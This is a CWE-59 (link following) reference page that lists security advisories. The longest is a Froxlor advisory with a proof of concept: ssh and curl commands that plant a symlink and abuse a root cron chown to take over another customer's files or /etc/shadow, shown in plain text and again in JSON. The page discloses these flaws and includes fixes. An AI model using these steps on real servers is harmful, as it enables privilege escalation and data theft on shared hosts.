CWE-59
AllowedImproper Link Resolution Before File Access ('Link Following')
Abstraction: Base · Status: Draft
The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource.
1987 vulnerabilities reference this CWE, most recent first.
GHSA-75H4-C557-J89R
Vulnerability from github – Published: 2026-04-16 00:47 – Updated: 2026-04-24 20:54Summary
DataDump.add() constructs the export destination path from user-supplied input without passing the $fixed_homedir parameter to FileDir::makeCorrectDir(), bypassing the symlink validation that was added to all other customer-facing path operations (likely as the fix for CVE-2023-6069). When the ExportCron runs as root, it executes chown -R on the resolved symlink target, allowing a customer to take ownership of arbitrary directories on the system.
Details
The vulnerability is an incomplete patch. After CVE-2023-6069, symlink validation was added to FileDir::makeCorrectDir() via a $fixed_homedir parameter. When provided, it walks each path component checking for symlinks that escape the customer's home directory (lines 134-157 of lib/Froxlor/FileDir.php).
Every customer-facing API command that builds a path from user input passes this parameter:
// DirProtections.php:87
$path = FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path, $customer['documentroot']);
// DirOptions.php:96
$path = FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path, $customer['documentroot']);
// Ftps.php:178
$path = FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path, $customer['documentroot']);
// SubDomains.php:585
return FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path, $customer['documentroot']);
But DataDump.add() was missed:
// DataDump.php:88 — NO $fixed_homedir parameter
$path = FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path);
The path flows unvalidated into a cron task (lib/Froxlor/Api/Commands/DataDump.php:133):
Cronjob::inserttask(TaskId::CREATE_CUSTOMER_DATADUMP, $task_data);
When ExportCron::handle() runs as root, it executes at lib/Froxlor/Cron/System/ExportCron.php:232:
FileDir::safe_exec('chown -R ' . (int)$data['uid'] . ':' . (int)$data['gid'] . ' ' . escapeshellarg($data['destdir']));
The chown -R command follows symlinks in its target argument. If $data['destdir'] resolves through a symlink to an arbitrary directory, the attacker's UID/GID is applied recursively to that directory and all its contents.
The Validate::validate() call on line 86 uses an empty pattern, which falls back to /^[^\r\n\t\f\0]*$/D — this only strips control characters and does not prevent symlink names. makeSecurePath() strips shell metacharacters and .. traversal but does not check for symlinks.
PoC
Prerequisites:
- system.exportenabled = 1 (admin setting)
- Customer account with API key and FTP/SSH access
# Step 1: Create a symlink inside the customer's docroot pointing to a victim directory
# (customer has FTP/SSH access to their own docroot)
ssh customer@server 'ln -s /var/customers/webs/victim_customer /var/customers/webs/attacker_customer/steal'
# Step 2: Schedule data export via API with path pointing to the symlink
curl -X POST \
-H "Content-Type: application/json" \
-d '{"header":{"apikey":"CUSTOMER_API_KEY","secret":"CUSTOMER_API_SECRET"},"body":{"command":"DataDump.add","params":{"path":"steal","dump_web":"1"}}}' \
https://panel.example.com/api.php
# Expected response: 200 OK with task_data including destdir
# Step 3: Wait for ExportCron to run (hourly cron as root)
# The cron executes:
# mkdir -p '/var/customers/webs/attacker_customer/steal/' (follows symlink, dir exists)
# tar cfz ... -C /var/customers/webs/attacker_customer/ . (tars attacker's web data)
# chown -R <attacker_uid>:<attacker_gid> '/var/customers/webs/attacker_customer/steal/.tmp/'
# mv export.tar.gz '/var/customers/webs/attacker_customer/steal/'
# chown -R <attacker_uid>:<attacker_gid> '/var/customers/webs/attacker_customer/steal/'
#
# The final chown resolves the symlink and recursively chowns
# /var/customers/webs/victim_customer/ to the attacker's UID/GID.
# Step 4: Attacker now owns all of victim's web files
ssh customer@server 'ls -la /var/customers/webs/victim_customer/'
# All files now owned by attacker_customer UID
# For system-level escalation, the symlink can target /etc:
# ln -s /etc /var/customers/webs/attacker_customer/steal
# After cron: attacker owns /etc/passwd, /etc/shadow → root shell
Impact
- Horizontal privilege escalation: A customer can take ownership of any other customer's web files, databases exports, and email data on the same server.
- Vertical privilege escalation: By targeting system directories (e.g.,
/etc), the customer can gain read/write access to/etc/passwdand/etc/shadow, enabling creation of a root account or password modification. - Data breach: Full read access to all files in the targeted directory tree, including configuration files with database credentials, application secrets, and user data.
- Service disruption: Changing ownership of system directories can break system services.
The attack requires only a single API call and a symlink. The impact is delayed until the next cron run (typically hourly), making it harder to attribute.
Recommended Fix
Pass $customer['documentroot'] as the $fixed_homedir parameter in DataDump.add(), consistent with every other API command:
// lib/Froxlor/Api/Commands/DataDump.php, line 88
// Before (vulnerable):
$path = FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path);
// After (fixed):
$path = FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path, $customer['documentroot']);
Additionally, the ExportCron should use chown -h (no-dereference) or validate the destination path is not a symlink before executing chown -R:
// lib/Froxlor/Cron/System/ExportCron.php, line 232
// Add symlink check before chown
if (is_link(rtrim($data['destdir'], '/'))) {
$cronlog->logAction(FroxlorLogger::CRON_ACTION, LOG_ERR, 'Export destination is a symlink, skipping chown for security: ' . $data['destdir']);
} else {
FileDir::safe_exec('chown -R ' . (int)$data['uid'] . ':' . (int)$data['gid'] . ' ' . escapeshellarg($data['destdir']));
}
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "froxlor/froxlor"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.3.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-41231"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-16T00:47:18Z",
"nvd_published_at": "2026-04-23T04:16:19Z",
"severity": "HIGH"
},
"details": "## Summary\n\n`DataDump.add()` constructs the export destination path from user-supplied input without passing the `$fixed_homedir` parameter to `FileDir::makeCorrectDir()`, bypassing the symlink validation that was added to all other customer-facing path operations (likely as the fix for CVE-2023-6069). When the ExportCron runs as root, it executes `chown -R` on the resolved symlink target, allowing a customer to take ownership of arbitrary directories on the system.\n\n## Details\n\nThe vulnerability is an incomplete patch. After CVE-2023-6069, symlink validation was added to `FileDir::makeCorrectDir()` via a `$fixed_homedir` parameter. When provided, it walks each path component checking for symlinks that escape the customer\u0027s home directory (lines 134-157 of `lib/Froxlor/FileDir.php`).\n\nEvery customer-facing API command that builds a path from user input passes this parameter:\n\n```php\n// DirProtections.php:87\n$path = FileDir::makeCorrectDir($customer[\u0027documentroot\u0027] . \u0027/\u0027 . $path, $customer[\u0027documentroot\u0027]);\n\n// DirOptions.php:96\n$path = FileDir::makeCorrectDir($customer[\u0027documentroot\u0027] . \u0027/\u0027 . $path, $customer[\u0027documentroot\u0027]);\n\n// Ftps.php:178\n$path = FileDir::makeCorrectDir($customer[\u0027documentroot\u0027] . \u0027/\u0027 . $path, $customer[\u0027documentroot\u0027]);\n\n// SubDomains.php:585\nreturn FileDir::makeCorrectDir($customer[\u0027documentroot\u0027] . \u0027/\u0027 . $path, $customer[\u0027documentroot\u0027]);\n```\n\nBut `DataDump.add()` was missed:\n\n```php\n// DataDump.php:88 \u2014 NO $fixed_homedir parameter\n$path = FileDir::makeCorrectDir($customer[\u0027documentroot\u0027] . \u0027/\u0027 . $path);\n```\n\nThe path flows unvalidated into a cron task (`lib/Froxlor/Api/Commands/DataDump.php:133`):\n\n```php\nCronjob::inserttask(TaskId::CREATE_CUSTOMER_DATADUMP, $task_data);\n```\n\nWhen `ExportCron::handle()` runs as root, it executes at `lib/Froxlor/Cron/System/ExportCron.php:232`:\n\n```php\nFileDir::safe_exec(\u0027chown -R \u0027 . (int)$data[\u0027uid\u0027] . \u0027:\u0027 . (int)$data[\u0027gid\u0027] . \u0027 \u0027 . escapeshellarg($data[\u0027destdir\u0027]));\n```\n\nThe `chown -R` command follows symlinks in its target argument. If `$data[\u0027destdir\u0027]` resolves through a symlink to an arbitrary directory, the attacker\u0027s UID/GID is applied recursively to that directory and all its contents.\n\nThe `Validate::validate()` call on line 86 uses an empty pattern, which falls back to `/^[^\\r\\n\\t\\f\\0]*$/D` \u2014 this only strips control characters and does not prevent symlink names. `makeSecurePath()` strips shell metacharacters and `..` traversal but does not check for symlinks.\n\n## PoC\n\nPrerequisites:\n- `system.exportenabled` = 1 (admin setting)\n- Customer account with API key and FTP/SSH access\n\n```bash\n# Step 1: Create a symlink inside the customer\u0027s docroot pointing to a victim directory\n# (customer has FTP/SSH access to their own docroot)\nssh customer@server \u0027ln -s /var/customers/webs/victim_customer /var/customers/webs/attacker_customer/steal\u0027\n\n# Step 2: Schedule data export via API with path pointing to the symlink\ncurl -X POST \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{\"header\":{\"apikey\":\"CUSTOMER_API_KEY\",\"secret\":\"CUSTOMER_API_SECRET\"},\"body\":{\"command\":\"DataDump.add\",\"params\":{\"path\":\"steal\",\"dump_web\":\"1\"}}}\u0027 \\\n https://panel.example.com/api.php\n\n# Expected response: 200 OK with task_data including destdir\n\n# Step 3: Wait for ExportCron to run (hourly cron as root)\n# The cron executes:\n# mkdir -p \u0027/var/customers/webs/attacker_customer/steal/\u0027 (follows symlink, dir exists)\n# tar cfz ... -C /var/customers/webs/attacker_customer/ . (tars attacker\u0027s web data)\n# chown -R \u003cattacker_uid\u003e:\u003cattacker_gid\u003e \u0027/var/customers/webs/attacker_customer/steal/.tmp/\u0027\n# mv export.tar.gz \u0027/var/customers/webs/attacker_customer/steal/\u0027\n# chown -R \u003cattacker_uid\u003e:\u003cattacker_gid\u003e \u0027/var/customers/webs/attacker_customer/steal/\u0027\n#\n# The final chown resolves the symlink and recursively chowns\n# /var/customers/webs/victim_customer/ to the attacker\u0027s UID/GID.\n\n# Step 4: Attacker now owns all of victim\u0027s web files\nssh customer@server \u0027ls -la /var/customers/webs/victim_customer/\u0027\n# All files now owned by attacker_customer UID\n\n# For system-level escalation, the symlink can target /etc:\n# ln -s /etc /var/customers/webs/attacker_customer/steal\n# After cron: attacker owns /etc/passwd, /etc/shadow \u2192 root shell\n```\n\n## Impact\n\n- **Horizontal privilege escalation:** A customer can take ownership of any other customer\u0027s web files, databases exports, and email data on the same server.\n- **Vertical privilege escalation:** By targeting system directories (e.g., `/etc`), the customer can gain read/write access to `/etc/passwd` and `/etc/shadow`, enabling creation of a root account or password modification.\n- **Data breach:** Full read access to all files in the targeted directory tree, including configuration files with database credentials, application secrets, and user data.\n- **Service disruption:** Changing ownership of system directories can break system services.\n\nThe attack requires only a single API call and a symlink. The impact is delayed until the next cron run (typically hourly), making it harder to attribute.\n\n## Recommended Fix\n\nPass `$customer[\u0027documentroot\u0027]` as the `$fixed_homedir` parameter in `DataDump.add()`, consistent with every other API command:\n\n```php\n// lib/Froxlor/Api/Commands/DataDump.php, line 88\n// Before (vulnerable):\n$path = FileDir::makeCorrectDir($customer[\u0027documentroot\u0027] . \u0027/\u0027 . $path);\n\n// After (fixed):\n$path = FileDir::makeCorrectDir($customer[\u0027documentroot\u0027] . \u0027/\u0027 . $path, $customer[\u0027documentroot\u0027]);\n```\n\nAdditionally, the `ExportCron` should use `chown -h` (no-dereference) or validate the destination path is not a symlink before executing `chown -R`:\n\n```php\n// lib/Froxlor/Cron/System/ExportCron.php, line 232\n// Add symlink check before chown\nif (is_link(rtrim($data[\u0027destdir\u0027], \u0027/\u0027))) {\n $cronlog-\u003elogAction(FroxlorLogger::CRON_ACTION, LOG_ERR, \u0027Export destination is a symlink, skipping chown for security: \u0027 . $data[\u0027destdir\u0027]);\n} else {\n FileDir::safe_exec(\u0027chown -R \u0027 . (int)$data[\u0027uid\u0027] . \u0027:\u0027 . (int)$data[\u0027gid\u0027] . \u0027 \u0027 . escapeshellarg($data[\u0027destdir\u0027]));\n}\n```",
"id": "GHSA-75h4-c557-j89r",
"modified": "2026-04-24T20:54:08Z",
"published": "2026-04-16T00:47:18Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/froxlor/froxlor/security/advisories/GHSA-75h4-c557-j89r"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41231"
},
{
"type": "WEB",
"url": "https://github.com/froxlor/froxlor/commit/2987b0e8806ef12b532410050ad76d13d673a87d"
},
{
"type": "PACKAGE",
"url": "https://github.com/froxlor/froxlor"
},
{
"type": "WEB",
"url": "https://github.com/froxlor/froxlor/releases/tag/2.3.6"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Froxlor has Incomplete Symlink Validation in DataDump.add() Allows Arbitrary Directory Ownership Takeover via Cron"
}
GHSA-75JH-P57M-93C3
Vulnerability from github – Published: 2022-05-01 02:17 – Updated: 2022-05-01 02:17GNU Gnump3d before 2.9.8 allows local users to modify or delete arbitrary files via a symlink attack on the index.lok temporary file.
{
"affected": [],
"aliases": [
"CVE-2005-3349"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2005-11-18T22:03:00Z",
"severity": "LOW"
},
"details": "GNU Gnump3d before 2.9.8 allows local users to modify or delete arbitrary files via a symlink attack on the index.lok temporary file.",
"id": "GHSA-75jh-p57m-93c3",
"modified": "2022-05-01T02:17:09Z",
"published": "2022-05-01T02:17:09Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2005-3349"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/17646"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/17647"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/17656"
},
{
"type": "WEB",
"url": "http://www.debian.org/security/2005/dsa-901"
},
{
"type": "WEB",
"url": "http://www.gentoo.org/security/en/glsa/glsa-200511-16.xml"
},
{
"type": "WEB",
"url": "http://www.gnu.org/software/gnump3d/ChangeLog"
},
{
"type": "WEB",
"url": "http://www.gnu.org/software/gnump3d/attacks.html#temporary-files"
},
{
"type": "WEB",
"url": "http://www.novell.com/linux/security/advisories/2005_28_sr.html"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/15497"
},
{
"type": "WEB",
"url": "http://www.vupen.com/english/advisories/2005/2489"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-75R7-WF67-87F9
Vulnerability from github – Published: 2024-06-10 18:31 – Updated: 2024-06-12 18:30A sym-linked file accessed via the repair function in Avast Antivirus <24.2 on Windows may allow user to elevate privilege to delete arbitrary files or run processes as NT AUTHORITY\SYSTEM. The vulnerability exists within the "Repair" (settings -> troubleshooting -> repair) feature, which attempts to delete a file in the current user's AppData directory as NT AUTHORITY\SYSTEM. A low-privileged user can make a pseudo-symlink and a junction folder and point to a file on the system. This can provide a low-privileged user an Elevation of Privilege to win a race-condition which will re-create the system files and make Windows callback to a specially-crafted file which could be used to launch a privileged shell instance.
This issue affects Avast Antivirus prior to 24.2.
{
"affected": [],
"aliases": [
"CVE-2024-5102"
],
"database_specific": {
"cwe_ids": [
"CWE-1284",
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-06-10T17:16:34Z",
"severity": "HIGH"
},
"details": "A sym-linked file accessed via the repair function in Avast Antivirus \u003c24.2 on Windows may allow user to elevate privilege to delete arbitrary files or run processes as NT AUTHORITY\\SYSTEM.\u00a0The vulnerability exists within the \"Repair\" (settings -\u003e troubleshooting -\u003e repair) feature, which attempts to delete a file in the current user\u0027s AppData directory as NT AUTHORITY\\SYSTEM. A\u00a0low-privileged user can make a pseudo-symlink and a junction folder and point to a file on the system. This can provide a low-privileged user an Elevation of Privilege to win a race-condition which will re-create the system files and make Windows callback to a specially-crafted file which could be used to launch a privileged shell instance.\n\nThis issue affects Avast Antivirus prior to 24.2.",
"id": "GHSA-75r7-wf67-87f9",
"modified": "2024-06-12T18:30:40Z",
"published": "2024-06-10T18:31:09Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-5102"
},
{
"type": "WEB",
"url": "https://support.norton.com/sp/static/external/tools/security-advisories.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-75V4-4VWX-6CFH
Vulnerability from github – Published: 2022-05-13 01:46 – Updated: 2022-05-13 01:46An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. macOS before 10.12.5 is affected. The issue involves the "iBooks" component. It allows attackers to execute arbitrary code in a privileged context via a crafted app that uses symlinks.
{
"affected": [],
"aliases": [
"CVE-2017-6981"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-05-22T05:29:00Z",
"severity": "HIGH"
},
"details": "An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. macOS before 10.12.5 is affected. The issue involves the \"iBooks\" component. It allows attackers to execute arbitrary code in a privileged context via a crafted app that uses symlinks.",
"id": "GHSA-75v4-4vwx-6cfh",
"modified": "2022-05-13T01:46:50Z",
"published": "2022-05-13T01:46:50Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-6981"
},
{
"type": "WEB",
"url": "https://support.apple.com/HT207797"
},
{
"type": "WEB",
"url": "https://support.apple.com/HT207798"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1038484"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-76HF-HRQR-9G56
Vulnerability from github – Published: 2024-03-12 18:31 – Updated: 2024-03-12 18:31Microsoft Office Elevation of Privilege Vulnerability
{
"affected": [],
"aliases": [
"CVE-2024-26199"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-03-12T17:15:58Z",
"severity": "HIGH"
},
"details": "Microsoft Office Elevation of Privilege Vulnerability",
"id": "GHSA-76hf-hrqr-9g56",
"modified": "2024-03-12T18:31:14Z",
"published": "2024-03-12T18:31:14Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26199"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26199"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-76QJ-3C6G-8V48
Vulnerability from github – Published: 2022-05-24 17:45 – Updated: 2022-05-24 17:45This vulnerability allows local attackers to delete arbitrary directories on affected installations of Avast Premium Security 20.8.2429 (Build 20.8.5653.561). An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.
The specific flaw exists within the AvastSvc.exe module. By creating a directory junction, an attacker can abuse the service to delete a directory. An attacker can leverage this vulnerability to create a denial-of-service condition on the system. Was ZDI-CAN-12082.
{
"affected": [],
"aliases": [
"CVE-2021-27241"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-03-29T21:15:00Z",
"severity": "MODERATE"
},
"details": "This vulnerability allows local attackers to delete arbitrary directories on affected installations of Avast Premium Security 20.8.2429 (Build 20.8.5653.561). An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the AvastSvc.exe module. By creating a directory junction, an attacker can abuse the service to delete a directory. An attacker can leverage this vulnerability to create a denial-of-service condition on the system. Was ZDI-CAN-12082.",
"id": "GHSA-76qj-3c6g-8v48",
"modified": "2022-05-24T17:45:37Z",
"published": "2022-05-24T17:45:37Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-27241"
},
{
"type": "WEB",
"url": "https://www.zerodayinitiative.com/advisories/ZDI-21-208"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-778F-2FC2-JRQ9
Vulnerability from github – Published: 2022-05-24 19:07 – Updated: 2022-05-24 19:07An improper symlink following in FortiClient for Mac 6.4.3 and below may allow an non-privileged user to execute arbitrary privileged shell commands during installation phase.
{
"affected": [],
"aliases": [
"CVE-2021-26089"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-07-12T13:15:00Z",
"severity": "HIGH"
},
"details": "An improper symlink following in FortiClient for Mac 6.4.3 and below may allow an non-privileged user to execute arbitrary privileged shell commands during installation phase.",
"id": "GHSA-778f-2fc2-jrq9",
"modified": "2022-05-24T19:07:31Z",
"published": "2022-05-24T19:07:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-26089"
},
{
"type": "WEB",
"url": "https://fortiguard.com/advisory/FG-IR-21-022"
},
{
"type": "WEB",
"url": "https://www.zerodayinitiative.com/advisories/ZDI-22-078"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-77GX-3RJC-296Q
Vulnerability from github – Published: 2022-05-17 04:06 – Updated: 2025-04-12 12:52kernel_crashdump in Apport before 2.19 allows local users to cause a denial of service (disk consumption) or possibly gain privileges via a (1) symlink or (2) hard link attack on /var/crash/vmcore.log.
{
"affected": [],
"aliases": [
"CVE-2015-1338"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2015-10-01T20:59:00Z",
"severity": "HIGH"
},
"details": "kernel_crashdump in Apport before 2.19 allows local users to cause a denial of service (disk consumption) or possibly gain privileges via a (1) symlink or (2) hard link attack on /var/crash/vmcore.log.",
"id": "GHSA-77gx-3rjc-296q",
"modified": "2025-04-12T12:52:26Z",
"published": "2022-05-17T04:06:04Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2015-1338"
},
{
"type": "WEB",
"url": "https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1492570"
},
{
"type": "WEB",
"url": "https://launchpad.net/apport/trunk/2.19"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/38353"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/133723/Ubuntu-Apport-kernel_crashdump-Symlink.html"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2015/Sep/101"
},
{
"type": "WEB",
"url": "http://www.halfdog.net/Security/2015/ApportKernelCrashdumpFileAccessVulnerabilities"
},
{
"type": "WEB",
"url": "http://www.ubuntu.com/usn/USN-2744-1"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-77QJ-G9F7-XQJ9
Vulnerability from github – Published: 2024-02-13 18:38 – Updated: 2024-02-13 18:38Microsoft Azure File Sync Elevation of Privilege Vulnerability
{
"affected": [],
"aliases": [
"CVE-2024-21397"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-02-13T18:15:58Z",
"severity": "MODERATE"
},
"details": "Microsoft Azure File Sync Elevation of Privilege Vulnerability",
"id": "GHSA-77qj-g9f7-xqj9",
"modified": "2024-02-13T18:38:24Z",
"published": "2024-02-13T18:38:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21397"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21397"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-788G-9RGV-XQPG
Vulnerability from github – Published: 2022-05-17 02:18 – Updated: 2022-05-17 02:18aegis 4.24 and aegis-web 4.24 allow local users to overwrite arbitrary files via a symlink attack on (a) /tmp/#####, (b) /tmp/#####.intro, (c) /tmp/aegis.#####.ae, (d) /tmp/aegis.#####, (e) /tmp/aegis.#####.1, (f) /tmp/aegis.#####.2, (g) /tmp/aegis.#####.log, and (h) /tmp/aegis.#####.out temporary files, related to the (1) bng_dvlpd.sh, (2) bng_rvwd.sh, (3) awt_dvlp.sh, (4) awt_intgrtn.sh, and (5) aegis.cgi scripts.
{
"affected": [],
"aliases": [
"CVE-2008-4938"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2008-11-05T15:00:00Z",
"severity": "MODERATE"
},
"details": "aegis 4.24 and aegis-web 4.24 allow local users to overwrite arbitrary files via a symlink attack on (a) /tmp/#####, (b) /tmp/#####.intro, (c) /tmp/aegis.#####.ae, (d) /tmp/aegis.#####, (e) /tmp/aegis.#####.1, (f) /tmp/aegis.#####.2, (g) /tmp/aegis.#####.log, and (h) /tmp/aegis.#####.out temporary files, related to the (1) bng_dvlpd.sh, (2) bng_rvwd.sh, (3) awt_dvlp.sh, (4) awt_intgrtn.sh, and (5) aegis.cgi scripts.",
"id": "GHSA-788g-9rgv-xqpg",
"modified": "2022-05-17T02:18:33Z",
"published": "2022-05-17T02:18:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2008-4938"
},
{
"type": "WEB",
"url": "https://bugs.gentoo.org/show_bug.cgi?id=235770"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/44835"
},
{
"type": "WEB",
"url": "http://bugs.debian.org/496400"
},
{
"type": "WEB",
"url": "http://bugs.debian.org/496402"
},
{
"type": "WEB",
"url": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=496402"
},
{
"type": "WEB",
"url": "http://dev.gentoo.org/~rbu/security/debiantemp/aegis"
},
{
"type": "WEB",
"url": "http://dev.gentoo.org/~rbu/security/debiantemp/aegis-web"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/31970"
},
{
"type": "WEB",
"url": "http://sourceforge.net/tracker/index.php?func=detail\u0026aid=2079025\u0026group_id=224\u0026atid=100224"
},
{
"type": "WEB",
"url": "http://uvw.ru/report.lenny.txt"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2008/10/30/2"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/30883"
}
],
"schema_version": "1.4.0",
"severity": []
}
Mitigation MIT-48.1
Strategy: Separation of Privilege
- Follow the principle of least privilege when assigning access rights to entities in a software system.
- Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted.
CAPEC-132: Symlink Attack
An adversary positions a symbolic link in such a manner that the targeted user or application accesses the link's endpoint, assuming that it is accessing a file with the link's name.
CAPEC-17: Using Malicious Files
An attack of this type exploits a system's configuration that allows an adversary to either directly access an executable file, for example through shell access; or in a possible worst case allows an adversary to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface.
CAPEC-35: Leverage Executable Code in Non-Executable Files
An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.
CAPEC-76: Manipulating Web Input to File System Calls
An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.